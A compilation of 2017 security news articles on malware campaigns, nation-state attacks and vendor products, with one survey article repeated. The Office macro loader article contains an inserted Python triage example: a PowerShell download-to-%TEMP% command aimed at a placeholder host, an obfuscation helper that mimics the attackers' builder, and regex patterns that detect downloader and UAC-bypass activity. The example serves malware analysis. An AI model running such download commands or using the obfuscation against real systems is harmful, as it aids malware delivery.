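Any single rule here will fire on benign activity occasionally (administrators do run ping against localhost); the value is in the per-host grouping, where an Office process spawning a downloader, the mscfile handler write and an eventvwr.exe child that is not mmc.exe landing on the same host within minutes of each other is the loader's signature. The ws02 record shows why the eventvwr rule must exclude mmc.exe.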


IaaS Creating New Variant of Shadow IT

13.2.2017 securityweek Crime
Custom Applications are being Increasingly Used from Within Public Clouds as Part of the Migration to IaaS

Organizations cannot rely on commercial off-the-shelf (COTS) software to fulfil all their IT requirements: almost all companies develop their own custom apps. The majority of these apps, whether internal or internet-facing, currently run on datacenters owned or operated locally. By the end of 2017 this will change -- the majority of enterprise custom apps will reside in public clouds as the industry-wide migration to Infrastructure as a Service (IaaS) increases speed.

A new report, conceived and developed by the Cloud Security Alliance and Skyhigh Networks, polled 314 qualified respondents in December 2016 and January 2017. The results (PDF) show that an increasing number of custom apps are being moved into cloud infrastructures (primarily AWS, Azure and Google Cloud Platform) without the security team necessarily being aware that they exist. This is effectively a new variant of Shadow IT -- it is not necessarily software unknown to the IT department, but it is software unknown to the head of security.

This presents a new security and compliance challenge since CISOs cannot secure what they cannot see. It is possible that the app developers assume that their apps are protected by the cloud providers' security, and therefore don't need to be sanctioned by in-house security. Certainly, the majority of respondents believe that IaaS is more secure than local data centers simply because of the huge security resources available to Amazon, Microsoft and Google.

But clouds operate a form of shared responsibility under which the customer is responsible for the data it uploads and the apps it develops. The report cites the example of Code Spaces, which provided a code repository for its customers on AWS. It was breached. AWS was not compromised, but rather the attackers got hold of a legitimate Code Spaces account password. Ultimately, they destroyed all the customers' data, and the effect on Code Spaces was so severe that it went out of business.

What the Skyhigh survey highlights is that more and more custom apps are being used from within public clouds as part of the migration to IaaS.

"The security of custom applications has not been a focus in many organizations," explains Nigel Hawthorn, Skyhigh's chief European spokesperson, "but every company is now a software company; 92 percent of them write their own custom apps, and the average enterprise will have more than 500 apps running in the next year. Moreover, 72% of companies have a bespoke critical app running today that is essential to operations. When these workloads are targeted by a cyberattack or fall victim to a mistake, the downtime will cost a business dearly. It's no surprise that application innovation is ahead of security but, with an average of 285 custom apps running that are unknown to IT security teams, companies must ensure that IT security is part of the custom app development process."

The actual number of apps unknown to security varies with the size of the organization. Small companies, with fewer than 1,000 employees, can have as few as 22 custom apps; but large companies with more than 50,000 employees can have an average of 788 apps. It is the invisibility of such a large number of them that causes the security concern. Sixty-five percent of respondents said they are moderately or very concerned for the security of custom apps in the cloud, with only 13.8% 'not at all concerned'.

"IT security professionals," says the report, "are only aware of 38.4% of the applications known to IT administrators. This means that IT security teams are involved in fewer than half of these applications to ensure corporate data is protected against threats. Rather than security being a barrier to development, it appears development is occurring without involvement from security."

The biggest single concern (from 66.5% of respondents) is that unprotected apps could be used to upload sensitive data to the cloud. This is followed at 56% by a third-party account compromise similar to the one suffered by Code Spaces. But 40.1% are also concerned about sensitive data being downloaded from the cloud to an unmanaged BYOD device.

Loss of personal data could be expensive under data protection regulations and damaging to brand reputation; but some of the custom apps are actually critical to business operations. Almost 73% of the respondents said they have at least one business-critical application. Forty-six percent of these are either fully deployed in the public cloud or in a hybrid public/private cloud -- and IT security professionals have incomplete visibility into their deployment and operations. As the migration to IaaS continues, the number of business-critical custom apps at risk will undoubtedly increase.

"Securing sensitive data in the cloud is no longer the remit of one party, it's a shared responsibility," says Hawthorn. "The rapid adoption of IaaS deployments sees the role split between infrastructure providers and enterprises, while internally, businesses cannot expect IT to manage cloud security alone. There needs to be buy-in from all departments to ensure custom applications have cybersecurity embedded from the start, and that employees continue to use them in ways that won't put corporate data at risk."

Last week, Skyhigh Networks SVP of products and marketing, Kamal Shah, announced in a blog post, "Skyhigh will pioneer this next phase of the cloud security market with Skyhigh for Custom Apps and Skyhigh for Amazon Web Services, Microsoft Azure, and Google Cloud Platform."


RSA Unveils Business-Driven Security Offering

13.2.2017 securityweek Security
RSA, which has been part of Dell Technologies since September, on Monday unveiled a new approach and product improvements designed to help organizations manage cyber risk.

With its new Business-Driven Security architecture, RSA aims to provide organizations the tools needed to link security information to business context and protect the most sensitive assets.

The RSA Business-Driven Security solutions focus on threat detection and response, consumer fraud protection, identity and access assurance, and business risk management.

This includes the RSA NetWitness Suite, which provides visibility and actionable insight for detecting advanced threats and understanding the full scope of an incident. The new capabilities added to the product enable organizations to monitor any infrastructure by collecting data from public clouds (e.g. AWS, Microsoft Azure), virtual environments, and physical infrastructure.

The launch of Business-Driven Security also brings improvements to RSA SecurID Access. RSA says the multi-factor authentication and access management product now offers a better way for delivering strong security to users, devices and applications.

The latest release of the RSA Fraud & Risk Intelligence Suite brings a centralized platform designed to improve fraud detection and investigation. The new platform should enable organizations to better protect their customers against cyberattacks by allowing them to obtain additional insights, including from internal and external sources, and other anti-fraud tools.

The offering also includes the RSA Archer Ignition Program, which helps organizations manage business risk through a combination of Governance Risk and Compliance (GRC) use cases, quick launch services and education offerings.

Finally, the Business-Driven Security architecture is operationalized via the new RSA Risk & Cybersecurity Practice. The practice aims to reduce business risk through risk management, identity assurance, incident response, and advanced cyber defense.

“Despite best efforts, today’s security approaches are in dire need of transformation because they fall short when they are put into action. This forces organizations into a downward cycle of investment and re-investment,” said Rohit Ghai, President, RSA. “RSA is proud to provide a new architecture and array of Business-Driven Security solutions that are engineered to enable the most critical elements of a sound security strategy: linking business context with security incidents to more strategically address and manage business risk to protect what matters most.”


National Cyber Security Centre – UK hit by dozens of major cyber attacks each month
13.2.2017 securityaffairs Cyber

Britain’s security has been threatened by 188 major cyber attacks in the last three months, according to the head of the National Cyber Security Centre.
According to the head of the National Cyber Security Centre (NCSC), the UK government suffered at least 188 major cyber attacks in the past three months.

Ciaran Martin, former GCHQ cybersecurity chief, told The Sunday Times that the attacks are mostly from China and Russia.

The attacks threatened national security: nation-state actors conducted cyber espionage campaigns aimed to “extract information on UK government policy on anything from energy to diplomacy to information on a particular sector.”

“Britain is being hit by 60 significant cyber-attacks a month, including attempts by Russian state-sponsored hackers to steal defence and foreign policy secrets from government departments, the new cyber-security chief has revealed.” reported The Sunday Times.

“In his first key interview, Ciaran Martin, head of GCHQ’s new National Cyber Security Centre (NCSC), warned there had been a “step change” in Russia’s online aggression against the West as well as more attacks on “soft targets” such as local councils and charities to steal personal data, and universities to steal research secrets.”


Martin confirmed that the UK suffered state-sponsored attacks similar to those that targeted the Democratic National Committee in the 2016 Presidential Election.

UK authorities highlighted “a step-change in Russian aggression in cyber space” over recent years.

“Part of that step change has been a series of attacks on political institutions, political parties, parliamentary organizations and that’s all very well evidenced by our international partners and widely accepted,” he said.

The National Cyber Security Centre had blocked 34,550 “potential attacks” on UK entities over the past six months.

“Meanwhile, Chancellor Phillip Hammond – a former defence and foreign secretary – said the NCSC had blocked 34,550 “potential attacks” on government departments and members of the public in the last six months – a rate of about 200 a day.” reported the BBC.


Office Loader Uses Macros to Drop Array of Malware

13.2.2017 securityweek Virus
A recently discovered Microsoft Office loader uses malicious macros to drop multiple malware families, Palo Alto Networks security researchers warn.

More than 650 unique samples of this loader have been observed since initial detection in early December 2016, accounting for 12,000 malicious sessions targeting numerous industries. The loader, researchers say, is being delivered via email and employs heavily obfuscated malicious macros and a user account control (UAC) bypass technique to compromise targeted systems.

The roughly 12,000 phishing emails distributing the loader used a variety of subject lines, claiming to be purchase orders, requests for quotation, purchase enquiries, and email verification notifications, among others. The attached malicious documents were masquerading as invoices, product lists, deposit slips, or document scans, and more.

High Tech, Professional and Legal Services, and Government were some of the most affected industries, Palo Alto Networks says. However, the distribution campaigns leveraging this loader have been targeting other sectors as well, including Wholesale, Telecoms, and Services.

Some of the malware families dropped using this loader included LuminosityLink, KeyBase, PredatorPain, Ancalog, Bartalex, Pony, and DarkComet.

“Based on the large amount of commodity malware families being dropped, as well as the wide distribution seen, this loader appears to primarily be used for widespread campaigns,” the security researchers say.

The loader uses malicious macros that have been obfuscated using a large amount of garbage code and randomly chosen variables, which led researchers to believe that a builder was used to generate them. The second part of the malicious macro, researchers say, includes not only garbage code, but also obfuscated strings and a number of strings written to the Word document and which are in-line with the ploy used by the attacker, based on the subject line and filename.

The first half of the macro, on the other hand, includes a function to decode the obfuscated strings, after which they are called with a PowerShell command. To decode the strings, the macro simply removes characters present within a blacklist string. However, researchers say that only about half of the samples contained decoy information.

One of the decoded functions was meant to download a payload via PowerShell and then drop it within the %TEMP% directory. The macro would also create a registry key to point to the dropped file, while also abusing Windows Event Viewer to bypass UAC and elevate its privileges. The dropped file is then removed.
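The blacklist-removal scheme described above (every character found in a blacklist string is deleted, and whatever remains is the real command) is simple enough to reimplement when triaging samples. The following Python is an added example, not Palo Alto Networks' code or the loader's own macro. The plaintext command, the URL, the file name and the blacklist are constructed for illustration, and the obfuscate() helper is a deterministic stand-in for whatever builder the attackers used; its only purpose is to produce input for the decoder.

```python
import re

# Constructed sample: a PowerShell download line of the kind the loader uses,
# with a made-up URL and file name (not taken from any real sample).
PLAINTEXT = ("powershell -w hidden (New-Object Net.WebClient)"
             ".DownloadFile('http://example.invalid/inv.exe','%TEMP%\\inv.exe')")
# Noise characters the builder inserts. The scheme only works if none of them
# occur in the plaintext, otherwise decoding would corrupt the real command.
BLACKLIST = "#@~^`"


def obfuscate(plain, blacklist, every=3):
    """Deterministic stand-in for the attackers' builder: insert one blacklist
    character after every `every` plaintext characters, cycling the blacklist."""
    if set(plain) & set(blacklist):
        raise ValueError("blacklist characters must be absent from the plaintext")
    out = []
    for i, ch in enumerate(plain, 1):
        out.append(ch)
        if i % every == 0:
            out.append(blacklist[(i // every - 1) % len(blacklist)])
    return "".join(out)


def decode_blacklist(obfuscated, blacklist):
    """The decoding the macro performs: drop every character found in the blacklist."""
    drop = set(blacklist)
    return "".join(ch for ch in obfuscated if ch not in drop)


# Indicators worth pulling out of decoded strings during triage.
IOC_PATTERNS = {
    "url": re.compile(r"https?://[^\s'\"()]+", re.I),
    "temp_path": re.compile(r"%TEMP%\\[^\s'\"()]+", re.I),
    "downloader": re.compile(r"\b(DownloadFile|DownloadString|bitsadmin)\b", re.I),
    "uac_bypass": re.compile(r"\beventvwr(\.exe)?\b", re.I),
}


def extract_iocs(decoded):
    """Return {indicator_name: [matches]} for every pattern that matches."""
    found = {}
    for name, pat in IOC_PATTERNS.items():
        hits = [m.group(0) for m in pat.finditer(decoded)]
        if hits:
            found[name] = hits
    return found


def triage(obfuscated_strings, blacklist):
    """Decode every string with the sample's blacklist and extract indicators."""
    decoded = [decode_blacklist(s, blacklist) for s in obfuscated_strings]
    return decoded, extract_iocs("\n".join(decoded))


if __name__ == "__main__":
    sample = obfuscate(PLAINTEXT, BLACKLIST)
    print("obfuscated:", sample)
    plain, iocs = triage([sample], BLACKLIST)
    print("decoded:   ", plain[0])
    print("indicators:", iocs)
```

The blacklist is recovered from the macro itself (it is the string the decode function subtracts), so for a new sample the analyst only has to pull that string and the obfuscated literals and run them through decode_blacklist. The constraint in obfuscate() is also the weakness of the scheme: because the noise alphabet cannot overlap the payload, the characters that never appear in the obfuscated literals tell you nothing, but the decode function's blacklist string is a stable artifact to hunt on across samples from the same builder.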

The UAC bypass was first detailed in August 2016, and was recently used in various campaigns, including some focused on the distribution of ransomware.

A small set of samples used the built-in BITSAdmin tool instead of PowerShell to download the malware. The technique was associated with 11 samples that were spotted in early December, when the loader first appeared. However, the attackers switched to PowerShell.

“Overall, this new loader is interesting in its use of performing a UAC bypass. Additionally, the widespread use of this loader since December of last year shows that it is being used in numerous campaigns. It is unclear if this loader is being used by one or more groups. Multiple industries have been targeted by this loader, which has been used to deploy multiple malware families,” Palo Alto researchers conclude.


Survey Examines Cybersecurity Perception in U.S.

13.2.2017 securityweek Cyber
Survey Highlights Widely Divergent Views on State of Cyber Security in America

A new survey of American adults' perceptions of cybersecurity and hackers shows both a generational and a gender divide in attitudes. Young adults often display a more pragmatic approach compared to a more hardline attitude from older Americans, while there is a frequent difference between the genders.

5000 American adults aged 16+ responded to an online survey conducted by Opinion Matters for HackerOne and Kaspersky Lab during December 2016. The purpose was to get insight into consumers' perception of the hacker mindset and motivation without specifically differentiating between blackhat hackers and whitehat researchers.

The generational divide is clearly shown in the respondents' attitude towards hacker motivation. Fifty-two percent of respondents aged 45-55+ believe that hacker motivation is to be malicious, and 59% believe the motivation is to create problems. Only 35% of those aged 16-24 think hackers hack with malicious intentions.

However, far fewer Americans believe in 'good intentions': 15% believe hackers hack to report vulnerabilities, and only 14% believe they are motivated by 'good feeling' in helping companies and government understand security weaknesses.

Knowledge of bug bounty and pentesting operations seems to make little difference to Americans' buying behavior. Only 22% say they are more likely to make a purchase from companies that use these to protect their services, while 54% say it will make no difference.

Of particular interest is the response to a question about current politics: "Do you think North America will be more vulnerable to cyber-espionage or nation-sponsored cyberattacks with Donald Trump as President of the United States?" Only 28% believed in December 2016 that Trump policies will definitely make the US more vulnerable. Sixteen percent thought it possible, but 56% didn't "think the risk will be any higher than before."

This seems to be in sharp contrast to current thinking from the government agencies tasked with protecting the US. The Observer yesterday published an article headlined "Intelligence Community pushes back against a White House it considers leaky, untruthful and penetrated by the Kremlin." Written by John Schindler, a former National Security Agency analyst and counterintelligence officer, it claims, "Our Intelligence Community is so worried by the unprecedented problems of the Trump administration... that it is beginning to withhold intelligence from a White House which our spies do not trust."

Of particular concern is a series of December telephone conversations between national security adviser Michael Flynn and the Russian embassy in Washington which would have been automatically monitored by US SIGINT (discussed in detail in The Washington Post on Thursday last week).

The implication is that the American people had greater trust in Trump's national security in December 2016 than the US intelligence community has in February 2017.

The survey (PDF) question also highlights both the generational and gender differences among American attitudes. Men are less concerned than women (60% vs 52%) about the state of cybersecurity under the new administration, while millennials (aged 16-24) "were the most likely to think that North America would be more vulnerable to cyber espionage or nation-sponsored cyberattacks with Donald Trump as president (56%)."

Particularly concerning, however, is that the majority of consumers do not trust their own employers. "Only 36% of U.S. adults," says the report, "said that they would choose to be a customer of their own employer knowing what they know about their company’s cybersecurity program and ability to protect customers from cyber criminals."

"This study," concludes Ryan Naraine, head of the U.S. Global Research and Analysis Team at Kaspersky Lab, "helps to highlight the ongoing confusion among Americans, both at home and while at work, regarding cybersecurity. Cybersecurity is everyone's responsibility, and it's imperative that the security community, businesses and governments routinely work together to educate Americans on cyber threats. We need to ensure that consumers and organizations are not only educated on the risks, but also know the best solutions for safeguarding sensitive data from cybercriminals."


Thousands of Android Devices Infected by Marcher Trojan

13.2.2017 securityweek Android
Researchers at Dutch security firm Securify have conducted a detailed analysis of the Android banking Trojan known as Marcher and discovered that a single botnet has managed to steal a significant number of payment cards.

Marcher has been around since late 2013, but it initially attempted to trick users into handing over their payment card details using Google Play phishing pages. In March 2014, the malware started targeting banks in Germany and, by the summer of 2016, there had already been more than 60 targeted organizations in the U.S., U.K., Australia, France, Poland, Turkey, Spain and other countries.

The malware has been disguised as various popular apps, including Netflix, WhatsApp and Super Mario Run.

Securify has identified nine Marcher botnets over the last 6 months, and each of them has been provided with new modules and targeted web injects by the Trojan’s creators.

One of these botnets, which mainly targets the customers of banks in Germany, Austria and France, has infected more than 11,000 devices, including 5,700 in Germany and 2,200 in France. The attackers’ C&C server stored 1,300 payment card numbers and other banking information.

Based on the analysis of the command and control (C&C) server used by the cybercriminals, researchers determined that a majority of the infected devices had been running Android 6.0.1, but the list of victims also included more than 100 Android 7.0 devices.


Marcher monitors the applications launched by the victim, and when one of the targeted apps is detected, an overlay screen is displayed in an effort to trick the user into handing over sensitive information.

“Marcher is one of the few Android banking Trojans to use the AndroidProcesses library, which enables the application to obtain the name of the Android package that is currently running in the foreground. This library is used because it uses the only (publicly known) way to retrieve this information on Android 6 (using the process OOM score read from the /proc directory),” Securify researchers explained.

In order to avoid being removed by security products, Marcher blocks popular mobile antivirus applications. Seven months ago, researchers said the Trojan had been blocking eight antiviruses, but Securify’s report shows that the malware currently targets nearly two dozen products.

“Based on the statistics we found on this one C2 panel we researched and the amount of different C2 panels out there, we believe that the potential financial losses due to Android banking Trojans are, or will soon be, bigger than the current losses from desktop malware like Gozi and Dridex, especially since hardly any of the banking apps seem to detect the attack,” experts said.


Microsoft Unveils New Security and Risk Capabilities in Office 365

13.2.2017 securityweek Security
Microsoft has unveiled several new capabilities in Office 365 to help customers better manage risks and protect against threats, including Office 365 Secure Score, Threat Intelligence Private Preview, and Advanced Data Governance Preview.

Office 365 Secure Score was designed as a security analytics tool that applies a score to the customers’ Office 365 security configuration. Secure Score, says Alym Rayani, director for Microsoft's Office Security and Compliance team, was created to provide customers with improved visibility into their Office 365 security configuration and into the security features available to them.

With the help of this new tool, customers will not only be able to understand their current Office 365 security configuration, but also to learn how implementing additional controls can improve their security and reduce risk, Rayani says.

Secure Score provides access to Score Analyzer via the Secure Score Summary. The Secure Score (or the numerator) is the sum of the points associated with the security configurations that a customer has adopted. The total score (or the denominator) is the sum of the points associated with all of the security controls available on the customer’s Office 365 plan.

The Score Analyzer allows customers to track and report their score over time. Customers are provided with access to a graph that shows their score on any date in the past, while also offering info on the specific actions they completed and which were available to them. The tool also offers support for exporting the score results to a CSV file for further use within an organization.

Secure Score also offers suggestions on possible actions that could improve one’s security position. These suggestions, Microsoft says, are prioritized depending on their effectiveness and impact to end users, meaning that those that are highly effective but have low impact on user experience are placed at the top.

The Office 365 Threat Intelligence, now in private preview, leverages the Microsoft Intelligent Security Graph to deliver actionable insights into global attack trends. The cost of data breaches is increasing, but organizations that are properly prepared for a breach can reduce its long-term costs.

The new Office 365 feature, Microsoft says, was designed to analyze data from global datacenters, Office clients, email, user authentications and other incidents and to deliver information about malware families inside and outside organizations, including breach information. Furthermore, it integrates with other Office 365 security features, including Exchange Online Protection and Advanced Threat Protection.

“Office 365 Threat Intelligence provides this visibility, along with rich insights and recommendations on mitigating cyber-threats, ultimately supporting a proactive defense posture, leading to long-term reduced organizational costs,” Rayani notes.

With the help of Office 365 Advanced Data Governance, customers can find and retain important data while eliminating redundant, obsolete and trivial data. By leveraging machine learning, it can deliver proactive policy recommendations; can classify data by analyzing numerous factors, including data type, age, and user interaction; and can take action such as preservation or deletion.

According to Microsoft, this means that organizations have a better grasp of their data and no longer expose themselves to unnecessary risks because they retain data they no longer need, but which could be exposed in the event of a data breach.

While Office 365 Secure Score is now available to organizations with an Office 365 commercial subscription and which are in the multi-tenant and Office 365 U.S. Government Community clouds, Office 365 Threat Intelligence and Advanced Data Governance should become available by the end of March 2017 as part of the Office 365 Enterprise E5 plan and the Secure Productive Enterprise E5 offering.


DHS Uses Cyber Kill Chain to Analyze Russia-Linked Election Hacks

13.2.2017 securityweek Cyber
DHS Publishes Enhanced Analysis Report on GRIZZLY STEPPE Activity

The Department of Homeland Security (DHS) National Cybersecurity and Communications Integration Center (NCCIC) on Friday published a new report providing additional indicators of compromise (IOC) and analysis using the cyber kill chain to detect and mitigate threats from the Russia-linked "GRIZZLY STEPPE" hackers.

On Dec. 29, 2016, the DHS and FBI published an initial Joint Analysis Report (JAR) detailing the tools and infrastructure used by Russian hackers designated by DHS as “GRIZZLY STEPPE” in attacks against the United States election. The previous report, however, didn’t deliver on its promise, security experts argued.

While the original report included a series of IOCs, some said that they were of low quality, had limited utility to defenders, and were published as a political tool attempting to connect the attacks to Russia.

The new report is described by DHS as an Analytical Report (AR) providing a “thorough analysis of the methods threat actors use to infiltrate systems” in relation to the GRIZZLY STEPPE hackers. The report provides additional details on IOCs, along with analysis along phases of the cyber kill chain, and suggests specific mitigation techniques that could be used to counter GRIZZLY STEPPE attackers.

Utilizing the Cyber Kill Chain to Analyze GRIZZLY STEPPE

DHS analysts leveraged the Cyber Kill Chain framework created by Lockheed Martin, which describes the phases of an attack. The report summarizes the activity of the campaign phase by phase: Reconnaissance, Weaponization, Delivery, Exploitation, Installation, Command and Control, and Actions on the Objective.

Figure: Cyber Kill Chain diagram of the GRIZZLY STEPPE activity.

The report also provides detailed host and network signatures to help defenders detect and mitigate GRIZZLY STEPPE related activity, including additional YARA rules and IOCs associated with the attacks.

The DHS has previously said that two different actors participated in the political attacks, one in the summer of 2015, namely APT29, and the other in spring 2016, namely APT28. The former is also known as Cozy Bear, or CozyDuke, while the latter is referred to as Fancy Bear, Pawn Storm, Strontium, Sofacy, Sednit and Tsar Team.

DHS recommends that security teams read multiple bodies of work from various sources concerning GRIZZLY STEPPE.

“While DHS does not endorse any particular company or their findings, we believe the breadth of literature created by multiple sources enhances the overall understanding of the threat. DHS encourages analysts to review these resources to determine the level of threat posed to their local network environments,” the agency said.


Watering hole attacks on Polish Banks Linked to Lazarus Group
13.2.2017 securityweek Crime

According to security experts from Symantec and BAE Systems, the recently discovered attacks aimed at Polish banks are linked to the Lazarus Group.
Last week, several Polish banks confirmed their systems were infected with malware after their staff visited the site of the Polish Financial Supervision Authority.

The cyber attack was first reported last Friday by Zaufana Trzecia Strona, a Polish news site.

The interesting aspect of the attack is that crooks used the Polish financial regulator, the Polish Financial Supervision Authority (KNF), to spread the malware.

A spokesman for the KNF confirmed that the regulator’s internal systems had been compromised by hackers “from another country”. The attackers dropped the malicious files used in the attacks against the Polish banks onto the regulator’s servers.

In order to avoid spreading the malware, the authorities took the decision to shut down the entire network at the KNF “in order to secure evidence.”


The malware-based attack was confirmed by a number of banks that are currently investigating the security breach.

At the time of writing there is no evidence that the attackers have successfully stolen money from Polish banks or their customers, but some of the targeted organizations confirmed they had noticed large outgoing data transfers.

Both BAE Systems and Symantec have started investigations into the attacks. According to Symantec, the threat actor behind the attack is the same one that has targeted financial organizations in 31 countries since at least October 2016.

According to Symantec, the Polish website used to target the Polish banks delivered a strain of malware known to be part of the toolkit of the Lazarus Group.

The activity of the Lazarus Group surged in 2014 and 2015; its members mostly used custom-tailored malware in their attacks, and the experts who investigated the crew consider it highly sophisticated.

This threat actor has been active since at least 2009, possibly as early as 2007, and it was involved in both cyber espionage campaigns and sabotage activities aimed to destroy data and disrupt systems.

The experts at Symantec have spotted in the past at least three strains of malware used by the group, Backdoor.Fimlis, Backdoor.Fimlis.B, and Backdoor.Contopee, which have been used in targeted attacks against financial institutions.

The attackers exploited “watering holes” in order to infect the machines of a specific audience with previously unknown malware.

“Symantec has blocked attempts to infect customers in Poland, Mexico and Uruguay by the same exploit kit that infected the Polish banks. Since October, 14 attacks against computers in Mexico were blocked, 11 against computers in Uruguay, and two against computers in Poland.” reads the analysis published by Symantec.

Malware researchers at Symantec have identified roughly 150 targeted IPs associated with more than 100 organizations across 31 countries. The attackers focused their activities on banks, but the list of victims also includes ISPs and telecom operators.

“The attackers appear to be using compromised websites to redirect visitors to a customized exploit kit, which is preconfigured to only infect visitors from approximately 150 different IP addresses. These IP addresses belong to 104 different organizations located in 31 different countries. The vast majority of these organizations are banks, with a small number of telecoms and internet firms also on the list.” continues Symantec.


Experts at Kaspersky have linked the group to the hacking operations Dark Seoul and Operation Troy. Kaspersky Lab, along with a number of security firms including Novetta, AlienVault, Invincea, ThreatConnect, Volexity, Symantec, and PunchCyber, has published reports on the activities of the Lazarus Group.

The group of security firms formed an alliance called Operation Blockbuster that issued the detection signatures to neutralize the hacking tools used by the APT.

In June 2016, the analysis of SWIFT attacks revealed five additional pieces of malware containing portions of code shared by Lazarus Group.

According to the analysis published by BAE Systems, one of the domains used in the Poland attack was also involved in a watering hole attack targeting the National Banking and Stock Commission of Mexico (cnbv.gob.mx), the Mexican equivalent of Poland’s KNF.

“The eye-watch[.]in domain appears to have been used in watering-hole attacks on other financial sector websites. On 2016-11-08 we observed connections to the site referred from:

hxxp://www.cnbv.gob[.]mx/Prensa/Paginas/Sanciones.aspx

This is the page for the Comisión Nacional Bancaria y de Valores (National Banking and Stock Commission of Mexico), specifically the portion of their site that details sanctions made by the Mexican National Banking Commission. This organisation is the Mexican banking supervisor and the equivalent of Poland’s KNF.” reads the analysis published by BAE Systems.

Below the key findings of the analysis conducted by BAE Systems:

There has been a series of watering hole attacks on bank supervisor websites in Poland & Mexico, and a state owned bank in Uruguay in recent months. These leverage Silverlight and Flash exploits to deliver malware.

Investigators in Poland have identified known Lazarus group implants on bank networks and associated this with the recent compromise of the Polish Financial Supervision Authority’s website.

The technical/forensic evidence to link the Lazarus group actors (who we believe are behind the Bangladesh Bank attack and many others in 2016) to the watering-hole activity is unclear. However, the choice of bank supervisor / state-bank websites would be apt, given their previous targeting of Central Banks for Heists – even when it serves little operational benefit for infiltrating the wider banking sector.

Take a look at both reports; they are full of information and also include IoCs.


Survey Examines Cybersecurity Perception in U.S.

13.2.2017 securityaffairs Cyber

Survey Highlights Widely Divergent Views on State of Cyber Security in America

A new survey of American adults' perceptions of cybersecurity and hackers shows both a generational and a gender divide in attitudes. Young adults often display a more pragmatic approach compared to a more hardline attitude from older Americans, while there is a frequent difference between the genders.

5000 American adults aged 16+ responded to an online survey conducted by Opinion Matters for HackerOne and Kaspersky Lab during December 2016. The purpose was to get insight into consumers' perception of the hacker mindset and motivation without specifically differentiating between blackhat hackers and whitehat researchers.

The generational divide is clearly shown in the respondents' attitude towards hacker motivation. Fifty-two percent of respondents aged 45-55+ believe that hacker motivation is to be malicious, and 59% believe the motivation is to create problems. Only 35% of those aged 16-24 think hackers hack with malicious intentions.

However, far fewer Americans believe in 'good intentions': 15% believe hackers hack to report vulnerabilities, and only 14% believe they are motivated by 'good feeling' in helping companies and government understand security weaknesses.

Knowledge of bug bounty and pentesting operations seems to make little difference to Americans' buying behavior. Only 22% say they are more likely to make a purchase from companies that use these to protect their services, while 54% say it will make no difference.

Of particular interest is the response to a question about current politics: "Do you think North America will be more vulnerable to cyber-espionage or nation-sponsored cyberattacks with Donald Trump as President of the United States?" Only 28% believed in December 2016 that Trump policies will definitely make the US more vulnerable. Sixteen percent thought it possible, but 56% didn't "think the risk will be any higher than before."

This seems to be in sharp contrast to current thinking from the government agencies tasked with protecting the US. The Observer yesterday published an article headlined "Intelligence Community pushes back against a White House it considers leaky, untruthful and penetrated by the Kremlin." Written by John Schindler, a former National Security Agency analyst and counterintelligence officer, it claims, "Our Intelligence Community is so worried by the unprecedented problems of the Trump administration... that it is beginning to withhold intelligence from a White House which our spies do not trust."

Of particular concern is a series of December telephone conversations between national security adviser Michael Flynn and the Russian embassy in Washington which would have been automatically monitored by US SIGINT (discussed in detail in The Washington Post on Thursday last week).

The implication is that the American people had greater trust in Trump's national security in December 2016 than the US intelligence community has in February 2017.

The survey (PDF) question also highlights both the generational and gender differences among American attitudes. Men are less concerned than women (60% vs 52%) about the state of cybersecurity under the new administration, while millennials (aged 16-24) "were the most likely to think that North America would be more vulnerable to cyber espionage or nation-sponsored cyberattacks with Donald Trump as president (56%)."

Particularly concerning, however, is that the majority of consumers do not trust their own employers. "Only 36% of U.S. adults," says the report, "said that they would choose to be a customer of their own employer knowing what they know about their company’s cybersecurity program and ability to protect customers from cyber criminals."

"This study," concludes Ryan Naraine, head of the U.S. Global Research and Analysis Team at Kaspersky Lab, "helps to highlight the ongoing confusion among Americans, both at home and while at work, regarding cybersecurity. Cybersecurity is everyone's responsibility, and it's imperative that the security community, businesses and governments routinely work together to educate Americans on cyber threats. We need to ensure that consumers and organizations are not only educated on the risks, but also know the best solutions for safeguarding sensitive data from cybercriminals."


Malware Attacks on Polish Banks Linked to Lazarus Group

13.2.2017 securityweek Virus
Poland Bank Attacks Part of Bigger Campaign Targeting Over 100 Organizations

The recently discovered attacks aimed at banks in Poland appear to be part of a bigger campaign targeting financial organizations around the world, and researchers have found some links to the threat actor known as Lazarus.

BadCyber reported earlier this month that the systems of several Polish banks had been infected with a new piece of malware. The attackers hijacked the website of the Polish Financial Supervision Authority (knf.gov.pl) and abused it to deliver malware to its visitors.

While there is no evidence that money has been stolen from banks or their customers, some of the organizations whose systems have been infected have noticed large outgoing data transfers.

Researchers at Symantec and BAE Systems have also analyzed the attack and determined that the custom exploit kit used by the attackers was configured to infect only visitors with certain IP addresses.

Symantec has identified roughly 150 targeted IPs associated with more than 100 organizations across 31 countries. Most of the targeted organizations are banks, but the list of targets also includes telecoms and Internet companies. The IP addresses have been linked to banks in Poland, the U.S., Mexico, Brazil, Chile, Denmark, Venezuela, Colombia, the U.K., Peru and India.

The custom exploit kit was used to target Symantec customers in Poland, Mexico and Uruguay in attacks first spotted in October 2016.

The Polish website used as a watering hole delivered a piece of malware known to be part of the toolkit of the Lazarus Group. This threat actor, analyzed last year by several security firms, has been active since at least 2009 – possibly as early as 2007 – and it has conducted not only cyber espionage operations, but also attacks whose goal was to destroy data and disrupt systems.

Several high profile attacks have been attributed to the Lazarus Group, including the 2014 attack on Sony, and the Dark Seoul and Operation Troy campaigns. The actor has targeted government, military, media, aerospace, financial and manufacturing organizations primarily in South Korea and the United States.

Researchers also discovered links between Lazarus and an attack on a bank in the Philippines believed to have been carried out by the same cybercriminals that stole $81 million from Bangladesh’s Central Bank.

BAE Systems discovered that one of the domains used in the recent Poland watering hole attack was also involved in a similar attack targeting the National Banking and Stock Commission of Mexico (cnbv.gob.mx), which is the Mexican equivalent of Poland’s KNF. The firm has also found evidence suggesting that the website of a state-owned bank in Uruguay had been targeted in a similar attack.

“The technical/forensic evidence to link the Lazarus group actors (who we believe are behind the Bangladesh Bank attack and many others in 2016) to the watering-hole activity is unclear,” BAE Systems researchers said in a blog post. “However, the choice of bank supervisor / state-bank websites would be apt, given their previous targeting of Central Banks for Heists – even when it serves little operational benefit for infiltrating the wider banking sector.”


Word documents laced with malicious macros used to hack Apple Mac systems
13.2.2017 securityaffairs Apple
Crooks are exploiting Word documents laced with malicious macros to compromise Apple Mac systems, exactly as they do with Windows machines.
It’s amazing how many Apple Mac users tell me their systems are immune to malware. This false sense of security is very dangerous, and I believe it is important to explain how Mac systems can also be compromised by malicious code.

I want to use a recent event to explore the topic: crooks exploiting Word documents laced with malicious macros to compromise Apple Mac systems, exactly as they do with Windows machines.

